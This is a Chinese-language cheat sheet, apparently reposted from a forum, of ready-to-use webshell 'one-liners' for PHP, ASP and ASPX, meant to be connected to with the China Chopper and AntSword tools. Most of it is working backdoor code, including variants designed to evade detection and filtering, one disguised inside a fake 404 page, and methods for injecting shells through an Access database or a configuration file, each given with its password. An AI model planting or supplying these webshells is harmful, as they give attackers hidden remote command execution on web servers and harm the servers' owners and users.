rce漏洞:利用代码或者命令去执行
常见的一句话木马:
1、普通一句话:
1
2
3
|
<?php @ eval ($_POST[123456]); ?> |
*post后面中括号里面的内容是使用菜刀或蚁剑连接时的密码
2、防爆破一句话:
1
2
3
4
|
<?php substr(md5($_REQUEST[ 'x' ]),28)== '6862' && eval ($_REQUEST[ 'password' ]); ?> *菜刀地址http: //192 .168.64.137 /x .php?x=myh0st |
3、过狗一句话:
1
2
3
4
5
|
<?php ($_=@$_GET[s]).@$_($_POST[hihack]) ?> // 菜刀地址 http: //localhost/1 .php?s=assert <php $a = "a" . "s" . "s" . "e" . "r" . "t" ; $a($_POST[hihack]); ?> |
4、404隐藏的一句话:
1
2
3
4
5
6
7
8
9
10
|
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN" > <html>< head > <title>404 Not Found< /title > < /head ><body> <h1>Not Found< /h1 > <p>The requested URL /error .php was not found on this server. < /p > < /body >< /html > <?php @preg_replace( "/[checksql]/e" ,$_POST[ 'hihack' ], "saft" ); ?> |
菜刀连接时在配置栏添加:
1
|
<O> date =@ eval ($_POST[paxmac]);< /O > |
5、不用问号(?)的一句话:
1
|
<script language= "php" > eval ($_POST[hihack]);< /script > |
6、躲避检测:
1
|
<?php assert($_REQUEST[ "hihack" ]);?> |
7、变形一句话后门:
1
|
访问该网页,然后菜刀连接: /myh0st .php 密码:hihack |
ASP一句话:
1、普通一句话:
1
|
<% eval request( "hihack" )%>或<%execute(request( "hihack" ))%> |
2、unicode编码的access木马 :
1
|
向access数据库插入 ┼攠數畣整爠煥敵瑳∨≡┩> 编码前:<% execute request( "a" )%> |
然后备份出webshell,密码a
3、配置文件插马(需要条件支持,插入的数据被写在了配置文件中):
1
|
插入: "%><% bbbb=request(" aaaa")%><%eval(bbbb)%><%' |
访问报错,获取到配置文件的地址,然后连接,密码aaaa
4、不用%的一句话:
1
|
<script language=VBScript runat=server>execute request( "hihack" )</script> |
5、不用双引号(“)的一句话:
1
|
<% eval request(chr(35))%> 密码: # |
ASPX一句话:
1、普通一句话:
1
|
<%@ Page Language=”Jscript”%> <%eval(Request.Item[“hihack”],”unsafe”);%> |
2、免杀一句话:
1
|
<%@PAGE LANGUAGE=JSCRIPT%><% var PAY:String=Request[“x61x62x63x64”];eval(PAY,”x75x6Ex73x61”+”x66x65”);%> |
转自http://bbs.tiger2019.cn/?thread-187.htm
然后利用菜刀或者蚁剑进行连接。
补充:反引号有种功能是执行系统命令,比如:
echo `ipconfig`